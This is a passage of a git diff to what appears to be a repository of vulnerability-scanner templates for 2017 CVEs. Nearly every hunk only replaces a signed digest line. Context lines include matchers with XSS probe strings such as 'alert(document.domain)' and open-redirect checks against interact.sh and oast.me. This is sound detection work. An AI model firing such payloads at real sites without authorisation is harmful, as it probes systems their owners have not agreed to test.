490a0046304402207db660dc21b7041f96e7059821202fa9174dabb19176560a4564c42d661232540220104044dad589e791a9d303e8a85870a87ccd93dad97033c99652021e0d9de8b8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a18619c03a0b427a82dd2ef8ecb0eab1b0b5e1953015bcd99ec632883aaa7be90220648b05dd5516a786c50c1201fa5c9ae7a86f75799882a0432e68edb6232b05db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml index b56ca67fe7..27d8e8a136 100644 --- a/http/cves/2017/CVE-2017-11586.yaml +++ b/http/cves/2017/CVE-2017-11586.yaml @@ -44,5 +44,4 @@ http: part: header regex: - 'Refresh:(.*)url=http:\/\/interact\.sh' - -# digest: 4a0a00473045022100fd38ca7ea2a1b3c8bfbd3d50ad147b12827c2864a797c04270155f1367805eb902202a9fe12e3b4ded4140a1fd49c3bf3a4d676e97b7d818fbce8ac7e8163cd537ae:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d947622b6f30567bdb3565e3c1f3e2c9323b408e15b422044150fdcd97fdfcf8022100a9faadc15f735b2dfcff5be8e876fcdf22d4a47250caec09b46847e100de1ce6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 000644e917..61af94e8c0 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008d89d4115597d825bdec56f2751b818af5e924a5ff014949a638104088f12cd3022100cda153767540a7263cea238894fcb895dc151d521ea68fba59d140958246719d:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200d639733acf05d35fb75b04fdc10a84984a06b091bbfb623abd210a6ce700a3e0220131d91e2872842c75a6cf4f3249ec0e62de79fbe549c3871fd8b93a76d10d48b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 83b77533d9..20ef94d911 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -43,5 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4b0a00483046022100fbe29e5fdcf4c20256a846ca644c9aaac1eef55034ca9558f362c0df900d29f7022100af0a2db2385a73526aa24a519187104ba07ec93b11b8a61308b8d401765206c6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009eecd3f1b4721cba9227114d76ff8ff2d14e6f3713c8269a9ca324dec2daa8d7022100bf5ddba78b836692ef9e88a43415141e53dc9752cd0711d68f5441bcb34ce25b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index 23d11f0940..0741a47092 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b10d36ffe0d8c7099554df816f797f23ea940ff36665a6e9a7dec92d26fd362a0221008cb3a0745f420e95fe1d79df351fc329e68279a3d46bc1ee034d993b74e4122f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100daba5a1cc2357fc0763be3bb7503fdfe85015a68a8d68776b5ca896df5117bab02204482b94257875298db8c981ed3c47661c0d4cb6974d9548cf68082c8725ca8fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index 642701ada9..584b1511f1 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201f1dd86ce6fc368353a81aa8c1b6369aea31b58c46437fe1dc9365bf3e9664c402201519a70da221a9f57ce54937ea6928a68406bea5f37e6d44705f324068b58ce1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008862d6721fb603eb07866264705682a871cbc22f89e0e9af8418f07998ad4e320220293324532d9ec219add1fd6e07655c469014fb586f1f869717412d53ec7f1129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 713c69b886..c8ca1335b2 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220303894abfd03da68ca0d47514baf5c6ccdc1a4d83386d8e1f883e12e0411a52a0220674286d8885f74bbf2d16a815cd9deab4be391ec1387d0cd3c33bcbbcdadd0d5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d1d47fd7019306e293cd07cf3e28b4e36047b53b3fccc7a301b42a0169e5ed09022100b8563f0a7a2067d4afeb2657860f5d2b6ddcbc2a9653cd30d22c605fbfda37eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index f1fdec282a..4ce40f8299 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -67,5 +67,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a3cdcb5d83f4211278a3087007b8f087e9771a0d55efe766db8780fa9a37e761022100b1049b1a0cb2055b0fe1563692760c2e15e74ead15f2c17d4a9e450c63af8807:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a30af760e70c24b665a41b2604353b54fa16bd1cd43de4d17d333962abf1aabc02201d38f1d569f98e31541b1f2634c21c416a707c765902a4610555cc629602faa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index d83f35d8ef..f913c52819 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207fe07a5cb47829aa6fa48562cb24fa5a49457fa9dfd763dce35e8c8444bb956c022011a4677b3522f60a15dc6328603d97c9201725dd6f0f76bd60b782e5fc1ad0b0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c9029690673eb169f900af685604791db5bbf74e150b0abaeb5fd45ad8be4cdb0220275ae2928f1d805d99ff0dfe2f54b39361431d61d390e6c91a24e58f84ace1b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 54e6799030..33bb391810 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d14e513bc18aaa6d72e0852307007871393228800578aebb5f50ac83dc20fafb0221009f2b2df19da64526507e8ce6235932991ef002950999e8d2a97394bf9c033658:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ccd9133c6e49d823a7aeed6062011ca864c61a9b79a65164dc1d73b49011f517022100d68d7359ffbeef04e40ae938cc181359ab7fb2be2ce0096628c79680e7ef6f47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index a6fe6a924f..1c5272d165 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100920018adbb96c15dcaa2d9510696eb988a305fad5063d217208e0176a3c85b71022100c9842aa91f89e1410fcd688bde8bb9bd9252789b0c15066036aaf3436e1b4266:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ed5dddace7c1400795650837bba3e9810a388d132a6a6dc404744a9795073a7c02204e4bed5e6f399d0e54ffa5a60a1e1bba5d23ed6018767d78c46095f4c6228c73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index 7793ba4224..499a138c12 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204d9a8dbcfa7acaa7b18793f944f85a719cda4be0b762bcfe17f12a32b3ca6f7e02205b3bc36837ee9e179ae508e2c8de159c69d66d0cdd95f909aee5acfc0aebb119:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220092147013e94c8a37c1488fba6715a1dbb908721466fca4b34673d44a5a740c502205916fd48651a5a138343c29197d9f29638b3963615a972aa1d8f048ee7ea61df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index 55b3840375..3a1e610375 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202e2e1f20ce159ad42a11a20b3873cb35ab5b6a9c880cb58e669ff95ed07e623f02207e1002493c320d3f14b5321f3407f53b8f8623c94d899002b20ae33f57d3769a:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207e43f4b70d2a69130ddd316b849778af936f2c35058c44c136f2429c95ef9d22022062b7c1c5a6ffb9b9be4bec26f39bb4a4f8178ce4047a1c3db515b3cde353eb35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index 09b40b0793..78cf3c772b 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -37,5 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' - -# digest: 4a0a00473045022100fb497f7c8e5b03f5dc21168e1a38de804bb6b3b5e165fe15628577b00cf5800c02203d0549dc18a9371edd46721570d66df0bf00570d9f7402f7c3c638edf4785fd4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a585e46c709bff7b64a86a5e2dde7c7e6d2332ef254236d1a6796d3b7fc34703022006a4b78a46d595e43d21b076570db22d8cca666a386d08eeb50aeba7b8543cc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 12e128712a..9f97a68eb7 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202ce5c472beacb5f0fc1fe43008435ee6bf08a0e46d5570557e8c472c7d3adf0c022045177ab4e7e2a279ccc7dad7c257d5f94310619219d80a5c6294d4c8864ca382:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f0f72e7a900191d3916954ecf14eac13f6a03e7eec891dd4ed85dd14339cfd5f02203e1192492127d658c27b29b5fbe27c902ad6bf993878ad1eca4bcd6773f82d98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index 17cc08fe66..135d69f2b5 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204ffacb42cb78eaea29d9f12059a7e9544fd7c015a8910749267fc74e7abdf02c0221008644c3820feee9bb7ae05ff6e7b16da3b614d5187a39426df6e9af9c44f84ae1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008a74afe3539a56cbef60ea7de9e486b38227cb2d80f4a512f2f05d825f245477022004b89e016ee5b8cc47929ce40767fde657287a01e80a58faa945e29cfcf62680:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index b3286ff44b..cc3d71f6dc 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -51,5 +51,4 @@ http: - 'contains(body_2, "<script>alert(document.domain)</script>")' - 'contains(body_2, "2kb-amazon-affiliates-store")' condition: and - -# digest: 4a0a00473045022100cc35f26e646f3496597c5764c547cfbd51c8c169cda534bd110ab056bdd1bbbd0220420d518ec9fc703c675392e06888f56ebc22f371ea374bbef64820fee4b4475a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d9f0d7b1563de7cab3593f62d60a8f2eb39ca1367f4487b49c920e7c1421268202206809f6d7484a748ba2fe5adf308f61dfa534b64fcc8ba1b6986e3860243be315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index 28439b7306..b5f4794bb9 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -44,5 +44,4 @@ http: part: header words: - "text/html" - -# digest: 490a0046304402207321d4152bbdbbd7d01995ecb4b0cfc79e99353922e532e80b540258654a74e1022011f3ae11c72796fcff7521f76c09c3e3b10296f08d085e3c465c7cf6917d1dd2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e519f80831bfd89b680e203512c7a31258a659d11b7ea9fc403ddf0b9f09d03d022100a380c52bfe20015eb905d4e67bf9d376db6a67b04d8c5046e079447d3bd1f294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index 00b829deab..bcf39d9643 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100898f8fce3f5f909bcbef0ff0a876c96c65593097f17488cb3cee2c4acc69339d022100e194e726528db27995e49ddaaebf7df03ff8ccaab995f79dd715fa6d1526393c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207e59ac79badefdbb0d4ab80499280d3e69dce9b0b286891d886003026b39d4e202206f144c81931430686b5e58c2a6e7635a86ae0ad7d739541edd810545075b69e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index ed2a52393c..44f24532a3 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -38,5 +38,4 @@ http: - type: word words: - 'Unknown command: <script>alert(document.cookie)</script>' - -# digest: 490a00463044022100a2740d40be3d6d538526de18a1e41bf4ccead10e52184672c283b68dbf89e1b5021f5bd6ce5627ebd44373f2306036a4f15c9a62c5884b05eb71c5739f20265844:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d762f21481ad84f58c1adda5155f8bf6ecea2e336fdb37f8dcb103f5017f27250220330bdab079fa818dffe2bdbfca0181c3c0c4df051b0b53702483f070c5324ca3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index a665209359..e9f7ef0d08 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220443fd98990b6a78460751ed0012569c577856d9c1fcd98b67c9393da039710a70220459519104e1edfabe67075fc9660b029da1eba00446c17255503aa8ba730d9be:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022039e37777f4b272790740fa24df9eda90e5ce14f54083b473bd207a3893047881022100f551f8279f8a8abaffd134ff691a22272095ee2056f10a0ff4f0925bacc6e497:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 5e7a8b0e38..37d3bdb786 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022016edc921f137f1aec84864672b54edb49bbb5f8a17c9706c3e07915ec42e4fdc022030539cadfcb61035829d198e8caa52ed17d29f9eaf520e0baf53546e0405f7fe:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bc41d617eb8586dd7eabc07189a3ef0f7b16e8fb374eedfeedba8d7e49866ec702207ec35fe3f135335af5dee6da4c1ab8ce1cebce93623716b2af2ba1abddeb99a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 5084653d7b..17238ff6d8 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -55,5 +55,4 @@ http: - type: dsl dsl: - 'contains(body_2, "{{randstr_1}}")' - -# digest: 4a0a004730450221009617b3b67166470413319634b3bf6408e272c6c97e872fb29ceac54e4787d73e022032c4e532ea5d336cc484a4013842cf5f095ffca7435f8e144c665f538b61cc16:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b868709ad23713747b15b2427a996dbe1ebb3a67de531be1276cf013558a5afe02203e254746edf4da5502af55647c31bf140ed2f9991519c67d22210cf91e7a39c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index bb4f5845f5..3c02aefd96 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220609b3825a22563e39c7058e44510b9d3f8da54c701383a459a5c835585b40eda022100bc7423cb4d69cce8eb2b47b61662cb22c9d65382e4ad1e41309e296193572fe2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022035506dfcabfb9c46d5bcdf5e68cab4bd73ca3a0626d424f178343a4754a305120221009bf6d79184876e72ca7bd6a3e54cb926e9d550f36953067e5f9fb87d256769fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index a887eeb2bf..00a782bf25 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203a1240c9b634e325c5d5d44192dd2e131ff4e8e88677c99673a7a6c1b9b4223b02210083b5be3e4fa16cf97b0ee0c22e910fc8bddf291bafe5a2910e48702ba84fe6dd:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c9f28130e69645f6308fe24a70a2e16b29f56de3a0fb02bbb48802e2aa4d11d1022100d60867d1f07153e21c086f8ffd6e085adc2586f260ed6442650245851da0b9b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index 286897177a..c96813f999 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210080c6363e75a5a9ee8e237ac3e3955658a053dab13158ee70096ed1b84bf9342902206b3babcc9ca012145e13c80e3415b3b670b9512bed4a8126630823822d8a0e4b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022001c9c9cf47c92f70fda66af061a7688bd0c62cef39fd123da815088a2bff1c66022100f8ce2218d6f9089b50ae832adb57966ccd8aa9dff033a7b04d4874ffa1fbbc32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 8e774f2c37..c94e5c78cc 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b1240da4ed0544fb058c230817f4867ec02f505e7616458fb6790f3a7ec0e76e022100f8126f177ccfc97806a6aca15c0ff2d59f487d0a9f5a70cd9ccb8cb87c6ecdfe:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022048e87c3e8141b06f628be734ffdff0abebb4925addffb045bb992945db89601d022100a2f33bbb3de41f0831e7323f79765ecc58977084ff519d8a38a51dd36be03e42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index efbeb80365..b41f014ef5 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220057de48a4c6d481e481755fee1d70674b601caf229b5fb6bf894f1dc353f913702203e5bc3caa6ac52719d5cf609da0115a4bf016f378ffa8f61d8a44e53656a580d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c5f7720ccdddcfda621975443042ef337352ba9cb8606114359aa7e5f8251f4b022023599fe59518976df111ae70bbc0324cc70531e7a3097bae2a7d3df97c08f2f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 7d5e09f57e..1bfd00eccd 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ef682fad3c3697ee174da18ea044c5fbad9fb14ecee295b206d4ebc28c4925c002203bbdc9c0c92e9e1f76ab6f6ff4ab50570d969454399e3036b431a92ee9dc3fbd:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022034ab79be484bdd6a9b31ffa50acacdca1b8079180d3f3b34ab23e88916df823802206f1902e31dabfb870f41ad14b1a910d98e0fa784dfc0dc3fc027a9ad2843f5cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index be119b0a8e..a658a13c24 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220357bec19bdf47d3b988997b82ee1cc804695ca16aa32fe526365f00ac47cca8c02200c58c6efa13c9fd306d4da7428590ba491dcf2cab4aaa8446d22658d1bd1eeda:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205d431fb66ab164925354afac77f3ac5418e8b453fe8db71fc10644ab2b39262b022100dc37cd8d842892d6fc5f1f147edb8d21058d04ce85fb8b063cb0abc45fadc5c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 8bd34ea522..b3419cf662 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -47,5 +47,4 @@ http: - "Database Setup" - "SQLServer" condition: and - -# digest: 4b0a00483046022100f67b47b3e23a2f4534fc15f3331e306f444f5d25d168b987554670b132684d7d022100eddaf658d2169ed1f62777b3aedf1e9f080f909595e52b8b54f3a90161a4a6ec:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205654f25e51e1ae7ecc646da365106eae507c91e228e9cbbcec903f6bb715dea502202ca4e0a287edb10e0539c9b6d0555d536b6ad181619a598573d5d40c2dd9dcf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index ca35c83114..8aaffd3a9a 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b269c5f1024b1a9e1e0c45caa698dccb6da711cb8cf586446184f80cac524f52022100f08a98dc1e06b3feb7eba292180e3f8d3d627667cd38786565358a7db60b2785:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201b6841a2402e3025d2f39e383830cf461243717383fe8a4320e2a9e6dbb012bd02207619a0285bda83bc8c5748bb31c1dec606921d993435b8d94ec1793f12b7021f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index c21f8c829a..181ec601a9 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Google AdSense")' condition: and - -# digest: 490a0046304402202bbfd644f75a2f6012f0516a01f8683358844385aec35c6464e54b4ac700c3fc02201bc890d568dc30599ac43cb3747f3acdc41d1073b356509da653f8ac40f9ec81:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e130b13b5c04cedbcb2405a3dcd99372865929bb58376a1c9b049e02ee22e742022100fa3158183202c93aa2da30cbc68352702fed3d8eb10c6d3c608afabee00fb178:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index f23b14124d..a54bbb6747 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Contact Form Multi by")' condition: and - -# digest: 4a0a0047304502210083a81803b0bad62417903ded83ba9afa4fc3726ed5c65d92396a763d354cc57302202d79a93e16d02b6d4be734571ad7a99e6290c263b73d754bd81c1da26923f7bd:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207587b9dd1bd7dece642970cad241214ae8d24ea18c2e17a634bc45f1d681d1fe0220302bfcb969bf6f4be0ca8b8ea201775098e5156d36ca467b2baed659475112cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index 88b4c61c28..b10677b0d7 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Contact Form by")' condition: and - -# digest: 490a0046304402207ac1145400b17905e6defb9c0fe17818a866da9765ad971f02412757c6db15430220606bcfd83b00f84a2804a92e69377737c8867d8b741462b776e43bafe4cdd9c8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e50c8b2c978dc3050f67c978cd4263da09b1ac3571d3bd62cbb7aa1ba98b2981022100bccda766abec307b80faa2af4e0c4cf0b35fae412ea7c99baf55f9e0414be618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index 34750c64bd..c97601c50c 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Contact Form to DB by")' condition: and - -# digest: 490a0046304402200d76fad7da53cc74a44d1cf60d17a09625e1d56e75a45c6b1c715f639c412b600220268cc60d4de477c219bc73e5a93753c7a6879b3a6064b6c152e677f680f30eee:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100eeb0d4e74b6213e4d2f58e2a2147cad8648dd8c16e204559dee6ad81848392d0022071bb319e1ba4bf7298ac691bf803e950200733d68ef5329f09cb8cba7923718c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index a3d3f0355f..08380be8fa 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Custom Admin Page by")' condition: and - -# digest: 4a0a0047304502200156ded6d323683b2ea974cd8b95a608aad7d6e7a8b51854cda3aaddd9887856022100c5457196535808fb58b4e59a56141a91ad2d4222aee26411140b2c257e42b0ed:922c64590222798bb761d5b6d8e72950 +# digest: 